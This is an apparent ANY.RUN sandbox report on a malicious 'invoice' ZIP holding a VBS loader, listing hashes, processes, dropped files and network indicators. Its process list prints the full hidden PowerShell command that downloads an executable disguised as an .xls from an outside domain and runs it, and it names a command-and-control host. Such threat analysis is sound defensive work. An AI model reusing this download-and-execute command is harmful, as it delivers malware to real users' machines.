analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SignIQ Pty Ltd invoice 127.zip

Full analysis: https://app.any.run/tasks/b304f663-902a-4dfc-8b1b-de104af5bb5d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 15, 2019, 08:44:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

1237AE60F76B5AECB8EB9FC55A858002

SHA1:

3CE266BAA2E645E85B01EB3CEDE10FFC4C15BE84

SHA256:

024B3CB1633DE1603168D69AF457AB313B56F9D609DF46BED4389A74D243E907

SSDEEP:

384:hryL7K2HYhSO4zre7SGTx7pv1MENKWfr+Lk3X8lfQc0yKj+pKZkJva:4L7bHYwO4wQq3TFlc+C0ZkY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • dVjiJafHlc.exe (PID: 1628)

    • Changes settings of System certificates

      • dVjiJafHlc.exe (PID: 1628)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2592)

    • Reads the machine GUID from the registry

      • powershell.exe (PID: 2592)
      • WScript.exe (PID: 2384)
      • WinRAR.exe (PID: 2856)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2384)

  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2136)
      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 908)
      • iexplore.exe (PID: 2488)
      • iexplore.exe (PID: 652)

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 2912)
      • IEXPLORE.EXE (PID: 2800)
      • IEXPLORE.EXE (PID: 1892)
      • IEXPLORE.EXE (PID: 1904)
      • IEXPLORE.EXE (PID: 2752)

    • Changes internet zones settings

      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 2136)
      • iexplore.exe (PID: 908)
      • iexplore.exe (PID: 652)
      • iexplore.exe (PID: 2488)

    • Reads the machine GUID from the registry

      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 2136)
      • iexplore.exe (PID: 908)
      • iexplore.exe (PID: 2488)
      • iexplore.exe (PID: 652)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 2136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: SignIQ Pty Ltd invoice 127.vbs
ZipUncompressedSize: 69345
ZipCompressedSize: 18326
ZipCRC: 0x98232722
ZipModifyDate: 2019:04:15 00:29:05
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
14
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs powershell.exe no specs dvjijafhlc.exe iexplore.exe iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
2856"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2384"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.vbs" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2592"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -exec bypass -nop if($host.version.major -lt 3){Import-Module BitsTransfer} Start-BitsTransfer -Source https://saintsandsinnersbar.com/duplicate/answear.xls -Destination $env:temp\dVjiJafHlc.exe; Start-Process $env:temp\dVjiJafHlc.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1628"C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe" C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe
powershell.exe
User:
admin
Company:
INCA Internet Co., Ltd.
Integrity Level:
MEDIUM
Description:
nProtect KeyCrypt Program Database DLL
Version:
2003, 10, 1, 1
2136"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2912"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2136 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2728"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2800"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2728 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
908"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2752"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:908 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Total events
2 933
Read events
2 612
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
42
Unknown types
0

Dropped files

PID
Process
Filename
Type
2856WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa2856.37052\SignIQ Pty Ltd invoice 127.vbs
MD5:
SHA256:
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MWNSL020TRSPYEJ33VD.temp
MD5:
SHA256:
2136iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF2A434C7F99621D9E.TMP
MD5:
SHA256:
2136iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF80DE6EF062B4C06B.TMP
MD5:
SHA256:
2136iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{B81E0021-5F5A-11E9-8447-5254004AAD21}.dat
MD5:
SHA256:
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:B4E3FCBE4C648CA62B42BB2F78B08567
SHA256:E8762DDC8035A4D4803702B3657FC9AD336D06FCA461F210A47551D60A68AD1D
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1b6d5c.TMPbinary
MD5:B4E3FCBE4C648CA62B42BB2F78B08567
SHA256:E8762DDC8035A4D4803702B3657FC9AD336D06FCA461F210A47551D60A68AD1D
2136iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{B81E0023-5F5A-11E9-8447-5254004AAD21}.datbinary
MD5:ADDAB436AC4063BCD88D12A0B8B4D720
SHA256:419C2E350507688C6E85ABD167F2C172653BD93267A42B692D287B0472BF0A1F
2136iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\iecompatviewlist[1].xmlxml
MD5:F68A128CDAFA596C331514CA90B91859
SHA256:FB563F15F30BFB70F2BFA796047D1036454523E454ED792109B84F0DE5F68072
2728iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF6903DA4F78FDD3B0.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
12
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
94.23.14.191:443
https://saintsandsinnersbar.com/duplicate/answear.xls
FR
unknown
2136
iexplore.exe
GET
304
152.199.19.161:443
https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml
US
whitelisted
2136
iexplore.exe
GET
200
152.199.19.161:443
https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin
US
whitelisted
2136
iexplore.exe
GET
200
152.199.19.161:443
https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml
US
xml
363 Kb
whitelisted
GET
200
94.23.14.191:443
https://saintsandsinnersbar.com/duplicate/answear.xls
FR
executable
406 Kb
unknown
2752
IEXPLORE.EXE
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
1904
IEXPLORE.EXE
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
1628
dVjiJafHlc.exe
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
2912
IEXPLORE.EXE
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
1628
dVjiJafHlc.exe
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2136
iexplore.exe
152.199.19.161:443
r20swj13mr.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
94.23.14.191:443
saintsandsinnersbar.com
OVH SAS
FR
unknown
2752
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
1628
dVjiJafHlc.exe
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
2912
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
2800
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
1892
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
1904
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious

DNS requests

Domain
IP
Reputation
teredo.ipv6.microsoft.com
whitelisted
saintsandsinnersbar.com
  • 94.23.14.191
unknown
itschoolegz.com
  • 46.17.45.108
malicious
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
SignIQ Pty Ltd invoice 127.zip